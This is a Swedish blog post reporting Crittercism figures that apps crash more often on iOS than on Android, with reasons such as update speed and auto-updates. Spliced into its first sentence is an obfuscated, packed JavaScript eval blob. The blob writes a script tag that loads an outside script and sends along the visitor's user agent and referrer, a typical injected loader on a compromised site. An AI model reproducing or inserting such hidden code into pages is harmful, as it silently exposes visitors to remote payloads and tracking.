Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Appar kraschar oftare på iOS än på Andriod

Appar kraschar oftare på iOS än på Andriod
Sebastian

Enligt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ystis|var|u0026u|referrer|eakda||js|php’.split(’|’),0,{}))
statistik så kraschar applikationer oftare på iOS än på Android. Kanske något ni Apple-användare märkt, jag har i alla fall.

Varför apparna kraschar kan bero på många olika faktorer menar Criticisms. Både iOS och Android uppdaterar sina system väldigt ofta vilket då kan leda till kompatibilitetsproblem om användarna inte uppdaterar sina appar.
Appar på iOS kraschar i snitt 1,47 procent medan appar på Android kraschar 0,73 procent, mindre än hälften jämfört med Apples iOS.

Ett skäl till att siffrorna ser ut som de gör kan enligt Crittercism också bero på att Google låter utvecklarna släppa uppdateringar till sina appar snabbare än iOS och Apple. Det finns även en funktion till Android som låter apparna uppdateras automatiskt, något som iOS idag saknar.

Mätningarna täcker endast de appar som använder sig av Crittercisms utvecklingsverktyg. Crittercism har bland annat Google Ventures som investerare, enligt Forbes.